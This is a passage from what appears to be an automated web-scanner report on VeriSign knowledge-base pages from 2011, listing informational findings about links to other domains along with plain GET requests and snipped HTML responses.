<li><a href="//www.verisign.co.uk/authentication/consumer-authentication/vip-fraud-detection-services/index.html?tid=gn-i_need_to">
                                               Detect Fraud Online</a>
...[SNIP]...
<a class="promo-link" href="http://www.verisign.ch/ssl/free-trial/index.html?tid=gnps-promo">
           <img height="183" width="170" alt="Try VeriSign SSL or VeriSign Trust Seal - FREE!" src="https://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_ps-freetrial-promo.jpg"></a>
...[SNIP]...
<p class="small">
                                   <a href="//verisign.com/partnersupport/worldwide/partnersupport.html" rel="external">Email support for
                                       login help.</a>
...[SNIP]...
</div>
       <a class="promo-link" href="//www.verisign.com/partners/ssl-reseller-programs/featured-ssl-partners/index.html?tid=gnpartners-promo">
           <img height="231" width="170" alt="See all Featured SSL Partners" src="https://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_partners-featured-ssl-promo.jpg"></a>
...[SNIP]...
<a class="promo-link" href="/support/ssl-certificates-support/index.html?tid=gnpsupport-promo">
           <img height="183" width="170" alt="24/7 help with your SSL Certificates. Try the Knowledge Base." src="https://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_support-promo.jpg"></a>
...[SNIP]...
<li><a href="https://ssl-certificate-center.verisign.ch/process/retail/console_login?application_locale=VRSN_CH">
                   VeriSign Trust Center Sign In</a>
...[SNIP]...
<li><a href="https://trust-center.verisign.ch/process/retail/console_login?application_locale=VRSN_CH">
                   VeriSign Trust Center Sign In</a>
...[SNIP]...
<li><a href="https://cc-admin.geotrust.com/geocenter/reseller/logon.do">Code Signing Portal for Microsoft
                   Windows Mobile Sign In</a>
...[SNIP]...
<li><a href="https://products.verisign.com/geocenter/reseller/logon.do">VeriSign Partner Center Sign In</a>
...[SNIP]...
<li><a href="//blogs.verisign.com/?tid=footer">
               Blogs</a>
...[SNIP]...
<li><a href="//www.verisign.com/verisign-worldwide/index.html?tid=footer">Worldwide
                           Sites</a>
...[SNIP]...
<li>
                               <a href="//www.verisign.com/rss/index.html?tid=footer">RSS</a>
...[SNIP]...
</a>, <a href="//www.verisign.co.uk/authentication/consumer-authentication/two-factor-authentication/index.html">
                           two-factor authentication</a>, <a href="//www.verisign.co.uk/authentication/consumer-authentication/identity-protection/index.html">
                               identity protection</a>
...[SNIP]...
</a>
           and <a href="//www.verisign.co.uk/authentication/enterprise-authentication/pki-infrastructure-solutions/index.html?tid=gnps">
               public key infrastructure</a> (<a href="//www.verisign.co.uk/authentication/enterprise-authentication/managed-pki/index.html">PKI</a>
...[SNIP]...

14.11. https://knowledge.verisign.ch/support/ssl-certificates-support/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://knowledge.verisign.ch
Path:	/support/ssl-certificates-support/index.html

Issue detail

The page was loaded from a URL containing a query string:

https://knowledge.verisign.ch/support/ssl-certificates-support/index.html?tid=gnpsupport

The response contains the following links to other domains:

https://blogs.verisign.com/?tid=footer
https://cc-admin.geotrust.com/geocenter/reseller/logon.do
https://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_partners-featured-ssl-promo.jpg
https://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_ps-freetrial-promo.jpg
https://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_support-promo.jpg
https://products.verisign.com/geocenter/reseller/logon.do
https://seal.verisign.com/getseal?host_name=knowledge.verisign.ch&size=S&use_flash=YES&use_transparent=YES&lang=en
https://securitycenter.verisign.com/celp/enroll/outsideSearch?application_locale=VRSN_US&originator=VeriSign:CELP
https://ssl-certificate-center.verisign.ch/process/retail/console_login?application_locale=VRSN_CH
https://ssl-certificate-center.verisign.com/process/retail/console_login
https://trust-center.verisign.ch/process/retail/console_login?application_locale=VRSN_CH
https://verisign.com/partnersupport/worldwide/partnersupport.html
https://www.verisign.be/
https://www.verisign.ch/?tid=header-logo
https://www.verisign.co.jp/
https://www.verisign.co.nz/
https://www.verisign.co.uk/
https://www.verisign.co.uk/authentication/consumer-authentication/identity-protection/index.html
https://www.verisign.co.uk/authentication/consumer-authentication/two-factor-authentication/index.html
https://www.verisign.co.uk/authentication/consumer-authentication/two-factor-authentication/index.html?tid=gnps
https://www.verisign.co.uk/authentication/consumer-authentication/vip-fraud-detection-services/index.html?tid=gn-i_need_to
https://www.verisign.co.uk/authentication/enterprise-authentication/managed-pki/index.html
https://www.verisign.co.uk/authentication/enterprise-authentication/pki-infrastructure-solutions/index.html?tid=gnps
https://www.verisign.co.uk/authentication/individual-authentication/digital-id/?tid=gnps
https://www.verisign.com.au/
https://www.verisign.com.br/
https://www.verisign.com.hk/
https://www.verisign.com.sg/
https://www.verisign.com.tw/
https://www.verisign.com/
https://www.verisign.com/ar/
https://www.verisign.com/ca/
https://www.verisign.com/cl/
https://www.verisign.com/latinamerica/esp/
https://www.verisign.com/mx/
https://www.verisign.com/nl/
https://www.verisign.com/partners/ssl-reseller-programs/featured-ssl-partners/index.html?tid=gnpartners-promo
https://www.verisign.com/rss/index.html?tid=footer
https://www.verisign.com/verisign-worldwide/index.html?tid=footer
https://www.verisign.de/
https://www.verisign.dk/
https://www.verisign.es/
https://www.verisign.fr/
https://www.verisign.in/
https://www.verisign.it/
https://www.verisign.se/
https://www.verisignchina.com.cn/

Request

GET /support/ssl-certificates-support/index.html?tid=gnpsupport HTTP/1.1
Host: knowledge.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:42:32 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Connection: close

                                                                                                                                                                                                                                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w
...[SNIP]...
<p id="site_logo">
       <a title="Now from Symantec - VeriSign Authentication Services" href="//www.verisign.ch/?tid=header-logo">
           <img src="/apps/infocenter/sites/verisign/images/symc-auth_logo.png">
...[SNIP]...
<li><a href="//www.verisign.com/ar/">Argentina</a>
...[SNIP]...
<li><a href="//www.verisign.com.au/">Australia</a>
...[SNIP]...
<li><a href="//www.verisign.be/">Belgium</a>
...[SNIP]...
<li><a href="//www.verisign.com.br/">Brazil</a>
...[SNIP]...
<li><a href="//www.verisign.com/ca/">Canada</a>
...[SNIP]...
<li><a href="//www.verisign.com/cl/">Chile</a>
...[SNIP]...
<li><a href="//www.verisignchina.com.cn/">China</a>
...[SNIP]...
<li><a href="//www.verisign.dk/">Denmark</a>
...[SNIP]...
<li><a href="//www.verisign.fr/">France</a>
...[SNIP]...
<li><a href="//www.verisign.de/">Germany</a>
...[SNIP]...
<li><a href="//www.verisign.com.hk/">Hong Kong</a>
...[SNIP]...
<li><a href="//www.verisign.in/">India</a>
...[SNIP]...
<li><a href="//www.verisign.it/">Italy</a>
...[SNIP]...
<li><a href="//www.verisign.co.jp/">Japan</a>
...[SNIP]...
<li><a href="//www.verisign.com/latinamerica/esp/">Latin America</a>
...[SNIP]...
<li><a href="//www.verisign.com/mx/">Mexico</a>
...[SNIP]...
<li><a href="//www.verisign.com/nl/">Netherlands</a>
...[SNIP]...
<li><a href="//www.verisign.co.nz/">New Zealand</a>
...[SNIP]...
<li><a href="//www.verisign.com.sg/">Singapore</a>
...[SNIP]...
<li><a href="//www.verisign.es/">Spain</a>
...[SNIP]...
<li><a href="//www.verisign.se/">Sweden</a>
...[SNIP]...
<li><a href="//www.verisign.com.tw/">Taiwan</a>
...[SNIP]...
<li><a href="//www.verisign.com/">United States</a>
...[SNIP]...
<li><a href="//www.verisign.co.uk/">United Kingdom</a>
...[SNIP]...
<div id="header_seal">
           <script src="https://seal.verisign.com/getseal?host_name=knowledge.verisign.ch&size=S&use_flash=YES&use_transparent=YES&lang=en"
               type="text/javascript"></script>
...[SNIP]...
<li><a href="//www.verisign.co.uk/authentication/consumer-authentication/two-factor-authentication/index.html?tid=gnps">
                       Two-Factor Authentication</a>
...[SNIP]...
<li><a href="//www.verisign.co.uk/authentication/enterprise-authentication/pki-infrastructure-solutions/index.html?tid=gnps">
                           Public Key Infrastructure (PKI) Services</a>
...[SNIP]...
<li><a href="//www.verisign.co.uk/authentication/individual-authentication/digital-id/?tid=gnps">
                               Digital IDs for Secure Email</a>
...[SNIP]...
<li><a href="//www.verisign.co.uk/authentication/consumer-authentication/vip-fraud-detection-services/index.html?tid=gn-i_need_to">
                                               Detect Fraud Online</a>
...[SNIP]...
<a class="promo-link" href="http://www.verisign.ch/ssl/free-trial/index.html?tid=gnps-promo">
           <img height="183" width="170" alt="Try VeriSign SSL or VeriSign Trust Seal - FREE!" src="https://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_ps-freetrial-promo.jpg"></a>
...[SNIP]...
<p class="small">
                                   <a href="//verisign.com/partnersupport/worldwide/partnersupport.html" rel="external">Email support for
                                       login help.</a>
...[SNIP]...
</div>
       <a class="promo-link" href="//www.verisign.com/partners/ssl-reseller-programs/featured-ssl-partners/index.html?tid=gnpartners-promo">
           <img height="231" width="170" alt="See all Featured SSL Partners" src="https://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_partners-featured-ssl-promo.jpg"></a>
...[SNIP]...
<a class="promo-link" href="/support/ssl-certificates-support/index.html?tid=gnpsupport-promo">
           <img height="183" width="170" alt="24/7 help with your SSL Certificates. Try the Knowledge Base." src="https://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_support-promo.jpg"></a>
...[SNIP]...
<li><a href="https://ssl-certificate-center.verisign.ch/process/retail/console_login?application_locale=VRSN_CH">
                   VeriSign Trust Center Sign In</a>
...[SNIP]...
<li><a href="https://trust-center.verisign.ch/process/retail/console_login?application_locale=VRSN_CH">
                   VeriSign Trust Center Sign In</a>
...[SNIP]...
<li><a href="https://cc-admin.geotrust.com/geocenter/reseller/logon.do">Code Signing Portal for Microsoft
                   Windows Mobile Sign In</a>
...[SNIP]...
<li><a href="https://products.verisign.com/geocenter/reseller/logon.do">VeriSign Partner Center Sign In</a>
...[SNIP]...
</a> <a href="https://securitycenter.verisign.com/celp/enroll/outsideSearch?application_locale=VRSN_US&originator=VeriSign:CELP" style="background-image: url(/library/VERISIGN/ALL_OTHER/cran_button_75x24.gif); text-align: center; line-height: 24px; margin: 5px 10px 0pt 0pt; width: 75px; display: block; float: left; height: 24px; color: rgb(255,255,255); font-weight: bold; text-decoration: none">SEARCH</a>
...[SNIP]...
<br clear="left" />
<a href="https://ssl-certificate-center.verisign.com/process/retail/console_login" style="background-image: url(/library/VERISIGN/ALL_OTHER/cran_button_75x24.gif); text-align: center; line-height: 24px; margin: 5px 10px 0pt 0pt; width: 75px; display: block; float: left; height: 24px; color: rgb(255,255,255); font-weight: bold; text-decoration: none">SIGN IN</a>
...[SNIP]...
<li><a href="//blogs.verisign.com/?tid=footer">
               Blogs</a>
...[SNIP]...
<li><a href="//www.verisign.com/verisign-worldwide/index.html?tid=footer">Worldwide
                           Sites</a>
...[SNIP]...
<li>
                               <a href="//www.verisign.com/rss/index.html?tid=footer">RSS</a>
...[SNIP]...
</a>, <a href="//www.verisign.co.uk/authentication/consumer-authentication/two-factor-authentication/index.html">
                           two-factor authentication</a>, <a href="//www.verisign.co.uk/authentication/consumer-authentication/identity-protection/index.html">
                               identity protection</a>
...[SNIP]...
</a>
           and <a href="//www.verisign.co.uk/authentication/enterprise-authentication/pki-infrastructure-solutions/index.html?tid=gnps">
               public key infrastructure</a> (<a href="//www.verisign.co.uk/authentication/enterprise-authentication/managed-pki/index.html">PKI</a>
...[SNIP]...

14.12. https://knowledge.verisign.ch/support/trust-seal-support/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://knowledge.verisign.ch
Path:	/support/trust-seal-support/index.html

Issue detail

The page was loaded from a URL containing a query string:

https://knowledge.verisign.ch/support/trust-seal-support/index.html?tid=gnpsupport

The response contains the following links to other domains:

https://blogs.verisign.com/?tid=footer
https://cc-admin.geotrust.com/geocenter/reseller/logon.do
https://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_partners-featured-ssl-promo.jpg
https://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_ps-freetrial-promo.jpg
https://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_support-promo.jpg
https://products.verisign.com/geocenter/reseller/logon.do
https://seal.verisign.com/getseal?host_name=knowledge.verisign.ch&size=S&use_flash=YES&use_transparent=YES&lang=en
https://ssl-certificate-center.verisign.ch/process/retail/console_login?application_locale=VRSN_CH
https://trust-center.verisign.ch/process/retail/console_login?application_locale=VRSN_CH
https://trust-center.verisign.ch/process/retail/trust_console_login?application_locale=VTC_US
https://verisign.com/partnersupport/worldwide/partnersupport.html
https://www.verisign.be/
https://www.verisign.ch/?tid=header-logo
https://www.verisign.co.jp/
https://www.verisign.co.nz/
https://www.verisign.co.uk/
https://www.verisign.co.uk/authentication/consumer-authentication/identity-protection/index.html
https://www.verisign.co.uk/authentication/consumer-authentication/two-factor-authentication/index.html
https://www.verisign.co.uk/authentication/consumer-authentication/two-factor-authentication/index.html?tid=gnps
https://www.verisign.co.uk/authentication/consumer-authentication/vip-fraud-detection-services/index.html?tid=gn-i_need_to
https://www.verisign.co.uk/authentication/enterprise-authentication/managed-pki/index.html
https://www.verisign.co.uk/authentication/enterprise-authentication/pki-infrastructure-solutions/index.html?tid=gnps
https://www.verisign.co.uk/authentication/individual-authentication/digital-id/?tid=gnps
https://www.verisign.com.au/
https://www.verisign.com.br/
https://www.verisign.com.hk/
https://www.verisign.com.sg/
https://www.verisign.com.tw/
https://www.verisign.com/
https://www.verisign.com/ar/
https://www.verisign.com/ca/
https://www.verisign.com/cl/
https://www.verisign.com/latinamerica/esp/
https://www.verisign.com/mx/
https://www.verisign.com/nl/
https://www.verisign.com/partners/ssl-reseller-programs/featured-ssl-partners/index.html?tid=gnpartners-promo
https://www.verisign.com/rss/index.html?tid=footer
https://www.verisign.com/verisign-worldwide/index.html?tid=footer
https://www.verisign.com/vtcsslvideo/index.html
https://www.verisign.de/
https://www.verisign.dk/
https://www.verisign.es/
https://www.verisign.fr/
https://www.verisign.in/
https://www.verisign.it/
https://www.verisign.se/
https://www.verisignchina.com.cn/

Request

GET /support/trust-seal-support/index.html?tid=gnpsupport HTTP/1.1
Host: knowledge.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:43:01 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Connection: close

                                                                                                                                                                                                                                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w
...[SNIP]...
<p id="site_logo">
       <a title="Now from Symantec - VeriSign Authentication Services" href="//www.verisign.ch/?tid=header-logo">
           <img src="/apps/infocenter/sites/verisign/images/symc-auth_logo.png">
...[SNIP]...
<li><a href="//www.verisign.com/ar/">Argentina</a>
...[SNIP]...
<li><a href="//www.verisign.com.au/">Australia</a>
...[SNIP]...
<li><a href="//www.verisign.be/">Belgium</a>
...[SNIP]...
<li><a href="//www.verisign.com.br/">Brazil</a>
...[SNIP]...
<li><a href="//www.verisign.com/ca/">Canada</a>
...[SNIP]...
<li><a href="//www.verisign.com/cl/">Chile</a>
...[SNIP]...
<li><a href="//www.verisignchina.com.cn/">China</a>
...[SNIP]...
<li><a href="//www.verisign.dk/">Denmark</a>
...[SNIP]...
<li><a href="//www.verisign.fr/">France</a>
...[SNIP]...
<li><a href="//www.verisign.de/">Germany</a>
...[SNIP]...
<li><a href="//www.verisign.com.hk/">Hong Kong</a>
...[SNIP]...
<li><a href="//www.verisign.in/">India</a>
...[SNIP]...
<li><a href="//www.verisign.it/">Italy</a>
...[SNIP]...
<li><a href="//www.verisign.co.jp/">Japan</a>
...[SNIP]...
<li><a href="//www.verisign.com/latinamerica/esp/">Latin America</a>
...[SNIP]...
<li><a href="//www.verisign.com/mx/">Mexico</a>
...[SNIP]...
<li><a href="//www.verisign.com/nl/">Netherlands</a>
...[SNIP]...
<li><a href="//www.verisign.co.nz/">New Zealand</a>
...[SNIP]...
<li><a href="//www.verisign.com.sg/">Singapore</a>
...[SNIP]...
<li><a href="//www.verisign.es/">Spain</a>
...[SNIP]...
<li><a href="//www.verisign.se/">Sweden</a>
...[SNIP]...
<li><a href="//www.verisign.com.tw/">Taiwan</a>
...[SNIP]...
<li><a href="//www.verisign.com/">United States</a>
...[SNIP]...
<li><a href="//www.verisign.co.uk/">United Kingdom</a>
...[SNIP]...
<div id="header_seal">
           <script src="https://seal.verisign.com/getseal?host_name=knowledge.verisign.ch&size=S&use_flash=YES&use_transparent=YES&lang=en"
               type="text/javascript"></script>
...[SNIP]...
<li><a href="//www.verisign.co.uk/authentication/consumer-authentication/two-factor-authentication/index.html?tid=gnps">
                       Two-Factor Authentication</a>
...[SNIP]...
<li><a href="//www.verisign.co.uk/authentication/enterprise-authentication/pki-infrastructure-solutions/index.html?tid=gnps">
                           Public Key Infrastructure (PKI) Services</a>
...[SNIP]...
<li><a href="//www.verisign.co.uk/authentication/individual-authentication/digital-id/?tid=gnps">
                               Digital IDs for Secure Email</a>
...[SNIP]...
<li><a href="//www.verisign.co.uk/authentication/consumer-authentication/vip-fraud-detection-services/index.html?tid=gn-i_need_to">
                                               Detect Fraud Online</a>
...[SNIP]...
<a class="promo-link" href="http://www.verisign.ch/ssl/free-trial/index.html?tid=gnps-promo">
           <img height="183" width="170" alt="Try VeriSign SSL or VeriSign Trust Seal - FREE!" src="https://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_ps-freetrial-promo.jpg"></a>
...[SNIP]...
<p class="small">
                                   <a href="//verisign.com/partnersupport/worldwide/partnersupport.html" rel="external">Email support for
                                       login help.</a>
...[SNIP]...
</div>
       <a class="promo-link" href="//www.verisign.com/partners/ssl-reseller-programs/featured-ssl-partners/index.html?tid=gnpartners-promo">
           <img height="231" width="170" alt="See all Featured SSL Partners" src="https://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_partners-featured-ssl-promo.jpg"></a>
...[SNIP]...
<a class="promo-link" href="/support/ssl-certificates-support/index.html?tid=gnpsupport-promo">
           <img height="183" width="170" alt="24/7 help with your SSL Certificates. Try the Knowledge Base." src="https://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_support-promo.jpg"></a>
...[SNIP]...
<li><a href="https://ssl-certificate-center.verisign.ch/process/retail/console_login?application_locale=VRSN_CH">
                   VeriSign Trust Center Sign In</a>
...[SNIP]...
<li><a href="https://trust-center.verisign.ch/process/retail/console_login?application_locale=VRSN_CH">
                   VeriSign Trust Center Sign In</a>
...[SNIP]...
<li><a href="https://cc-admin.geotrust.com/geocenter/reseller/logon.do">Code Signing Portal for Microsoft
                   Windows Mobile Sign In</a>
...[SNIP]...
<li><a href="https://products.verisign.com/geocenter/reseller/logon.do">VeriSign Partner Center Sign In</a>
...[SNIP]...
<br style="clear: left" />
<a style="background-image: url(/library/VERISIGN/ALL_OTHER/cran_button_75x24.gif); text-align: center; line-height: 24px; margin: 5px 10px 0pt 0pt; width: 75px; display: block; float: left; height: 24px; color: rgb(255,255,255); font-weight: bold; text-decoration: none" href="https://trust-center.verisign.ch/process/retail/trust_console_login?application_locale=VTC_US">Sign In</a>
...[SNIP]...
<li>
                   <a href="https://www.verisign.com/vtcsslvideo/index.html" target="_blank">Trust Center Enrollment Demo (video) </a>
...[SNIP]...
<li><a href="//blogs.verisign.com/?tid=footer">
               Blogs</a>
...[SNIP]...
<li><a href="//www.verisign.com/verisign-worldwide/index.html?tid=footer">Worldwide
                           Sites</a>
...[SNIP]...
<li>
                               <a href="//www.verisign.com/rss/index.html?tid=footer">RSS</a>
...[SNIP]...
</a>, <a href="//www.verisign.co.uk/authentication/consumer-authentication/two-factor-authentication/index.html">
                           two-factor authentication</a>, <a href="//www.verisign.co.uk/authentication/consumer-authentication/identity-protection/index.html">
                               identity protection</a>
...[SNIP]...
</a>
           and <a href="//www.verisign.co.uk/authentication/enterprise-authentication/pki-infrastructure-solutions/index.html?tid=gnps">
               public key infrastructure</a> (<a href="//www.verisign.co.uk/authentication/enterprise-authentication/managed-pki/index.html">PKI</a>
...[SNIP]...

14.13. https://knowledge.verisign.com/support/code-signing-support/index previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://knowledge.verisign.com
Path:	/support/code-signing-support/index

Issue detail

The page was loaded from a URL containing a query string:

https://knowledge.verisign.com/support/code-signing-support/index?page=content&id=AR185

The response contains the following links to other domains:

https://cc-admin.geotrust.com/geocenter/reseller/logon.do
https://www.verisign.be/
https://www.verisign.ch/
https://www.verisign.de/
https://www.verisign.dk/
https://www.verisign.es/
https://www.verisign.fr/
https://www.verisign.in/
https://www.verisign.it/
https://www.verisign.se/
https://www.verisignchina.com.cn/

Request

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:44:36 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitio
...[SNIP]...
<li><a href="//www.verisign.be/">Belgium</a>
...[SNIP]...
<li><a href="//www.verisignchina.com.cn/">China</a>
...[SNIP]...
<li><a href="//www.verisign.dk/">Denmark</a>
...[SNIP]...
<li><a href="//www.verisign.fr/">France</a>
...[SNIP]...
<li><a href="//www.verisign.de/">Germany</a>
...[SNIP]...
<li><a href="//www.verisign.in/">India</a>
...[SNIP]...
<li><a href="//www.verisign.it/">Italy</a>
...[SNIP]...
<li><a href="//www.verisign.es/">Spain</a>
...[SNIP]...
<li><a href="//www.verisign.se/">Sweden</a>
...[SNIP]...
<li><a href="//www.verisign.ch/">Switzerland</a>
...[SNIP]...
<li><a href="https://cc-admin.geotrust.com/geocenter/reseller/logon.do">Code Signing Portal for Microsoft
Windows Mobile Sign In</a>
...[SNIP]...

14.14. https://knowledge.verisign.com/support/code-signing-support/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://knowledge.verisign.com
Path:	/support/code-signing-support/index.html

Issue detail

The page was loaded from a URL containing a query string:

https://knowledge.verisign.com/support/code-signing-support/index.html?tid=gnpsupport

The response contains the following links to other domains:

https://cc-admin.geotrust.com/geocenter/reseller/logon.do
https://www.verisign.be/
https://www.verisign.ch/
https://www.verisign.de/
https://www.verisign.dk/
https://www.verisign.es/
https://www.verisign.fr/
https://www.verisign.in/
https://www.verisign.it/
https://www.verisign.se/
https://www.verisignchina.com.cn/

Request

GET /support/code-signing-support/index.html?tid=gnpsupport HTTP/1.1
Host: knowledge.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:44:38 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w
...[SNIP]...
<li><a href="//www.verisign.be/">Belgium</a>
...[SNIP]...
<li><a href="//www.verisignchina.com.cn/">China</a>
...[SNIP]...
<li><a href="//www.verisign.dk/">Denmark</a>
...[SNIP]...
<li><a href="//www.verisign.fr/">France</a>
...[SNIP]...
<li><a href="//www.verisign.de/">Germany</a>
...[SNIP]...
<li><a href="//www.verisign.in/">India</a>
...[SNIP]...
<li><a href="//www.verisign.it/">Italy</a>
...[SNIP]...
<li><a href="//www.verisign.es/">Spain</a>
...[SNIP]...
<li><a href="//www.verisign.se/">Sweden</a>
...[SNIP]...
<li><a href="//www.verisign.ch/">Switzerland</a>
...[SNIP]...
<li><a href="https://cc-admin.geotrust.com/geocenter/reseller/logon.do">Code Signing Portal for Microsoft
Windows Mobile Sign In</a>
...[SNIP]...

14.15. https://knowledge.verisign.com/support/digital-id-support/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://knowledge.verisign.com
Path:	/support/digital-id-support/index.html

Issue detail

The page was loaded from a URL containing a query string:

https://knowledge.verisign.com/support/digital-id-support/index.html?tid=gnsupport

The response contains the following links to other domains:

https://cc-admin.geotrust.com/geocenter/reseller/logon.do
https://www.verisign.be/
https://www.verisign.ch/
https://www.verisign.de/
https://www.verisign.dk/
https://www.verisign.es/
https://www.verisign.fr/
https://www.verisign.in/
https://www.verisign.it/
https://www.verisign.se/
https://www.verisignchina.com.cn/

Request

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:44:40 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w
...[SNIP]...
<li><a href="//www.verisign.be/">Belgium</a>
...[SNIP]...
<li><a href="//www.verisignchina.com.cn/">China</a>
...[SNIP]...
<li><a href="//www.verisign.dk/">Denmark</a>
...[SNIP]...
<li><a href="//www.verisign.fr/">France</a>
...[SNIP]...
<li><a href="//www.verisign.de/">Germany</a>
...[SNIP]...
<li><a href="//www.verisign.in/">India</a>
...[SNIP]...
<li><a href="//www.verisign.it/">Italy</a>
...[SNIP]...
<li><a href="//www.verisign.es/">Spain</a>
...[SNIP]...
<li><a href="//www.verisign.se/">Sweden</a>
...[SNIP]...
<li><a href="//www.verisign.ch/">Switzerland</a>
...[SNIP]...
<li><a href="https://cc-admin.geotrust.com/geocenter/reseller/logon.do">Code Signing Portal for Microsoft
Windows Mobile Sign In</a>
...[SNIP]...

14.16. https://knowledge.verisign.com/support/eca-support/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://knowledge.verisign.com
Path:	/support/eca-support/index.html

Issue detail

The page was loaded from a URL containing a query string:

https://knowledge.verisign.com/support/eca-support/index.html?tid=gnsupport

The response contains the following links to other domains:

https://cc-admin.geotrust.com/geocenter/reseller/logon.do
https://www.verisign.be/
https://www.verisign.ch/
https://www.verisign.de/
https://www.verisign.dk/
https://www.verisign.es/
https://www.verisign.fr/
https://www.verisign.in/
https://www.verisign.it/
https://www.verisign.se/
https://www.verisignchina.com.cn/

Request

GET /support/eca-support/index.html?tid=gnsupport HTTP/1.1
Host: knowledge.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:44:41 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w
...[SNIP]...
<li><a href="//www.verisign.be/">Belgium</a>
...[SNIP]...
<li><a href="//www.verisignchina.com.cn/">China</a>
...[SNIP]...
<li><a href="//www.verisign.dk/">Denmark</a>
...[SNIP]...
<li><a href="//www.verisign.fr/">France</a>
...[SNIP]...
<li><a href="//www.verisign.de/">Germany</a>
...[SNIP]...
<li><a href="//www.verisign.in/">India</a>
...[SNIP]...
<li><a href="//www.verisign.it/">Italy</a>
...[SNIP]...
<li><a href="//www.verisign.es/">Spain</a>
...[SNIP]...
<li><a href="//www.verisign.se/">Sweden</a>
...[SNIP]...
<li><a href="//www.verisign.ch/">Switzerland</a>
...[SNIP]...
<li><a href="https://cc-admin.geotrust.com/geocenter/reseller/logon.do">Code Signing Portal for Microsoft
Windows Mobile Sign In</a>
...[SNIP]...

14.17. https://knowledge.verisign.com/support/mpki-for-ssl-support/index previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://knowledge.verisign.com
Path:	/support/mpki-for-ssl-support/index

Issue detail

The page was loaded from a URL containing a query string:

https://knowledge.verisign.com/support/mpki-for-ssl-support/index?page=home

The response contains the following links to other domains:

https://cc-admin.geotrust.com/geocenter/reseller/logon.do
https://www.verisign.be/
https://www.verisign.ch/
https://www.verisign.de/
https://www.verisign.dk/
https://www.verisign.es/
https://www.verisign.fr/
https://www.verisign.in/
https://www.verisign.it/
https://www.verisign.se/
https://www.verisignchina.com.cn/

Request

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:27:51 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Keep-Alive: timeout=15
Connection: Keep-Alive
Content-Length: 42730

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w
...[SNIP]...
<li><a href="//www.verisign.be/">Belgium</a>
...[SNIP]...
<li><a href="//www.verisignchina.com.cn/">China</a>
...[SNIP]...
<li><a href="//www.verisign.dk/">Denmark</a>
...[SNIP]...
<li><a href="//www.verisign.fr/">France</a>
...[SNIP]...
<li><a href="//www.verisign.de/">Germany</a>
...[SNIP]...
<li><a href="//www.verisign.in/">India</a>
...[SNIP]...
<li><a href="//www.verisign.it/">Italy</a>
...[SNIP]...
<li><a href="//www.verisign.es/">Spain</a>
...[SNIP]...
<li><a href="//www.verisign.se/">Sweden</a>
...[SNIP]...
<li><a href="//www.verisign.ch/">Switzerland</a>
...[SNIP]...
<li><a href="https://cc-admin.geotrust.com/geocenter/reseller/logon.do">Code Signing Portal for Microsoft
Windows Mobile Sign In</a>
...[SNIP]...

14.18. https://knowledge.verisign.com/support/mpki-for-ssl-support/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://knowledge.verisign.com
Path:	/support/mpki-for-ssl-support/index.html

Issue detail

The page was loaded from a URL containing a query string:

https://knowledge.verisign.com/support/mpki-for-ssl-support/index.html?tid=gnsupport

The response contains the following links to other domains:

https://cc-admin.geotrust.com/geocenter/reseller/logon.do
https://www.verisign.be/
https://www.verisign.ch/
https://www.verisign.de/
https://www.verisign.dk/
https://www.verisign.es/
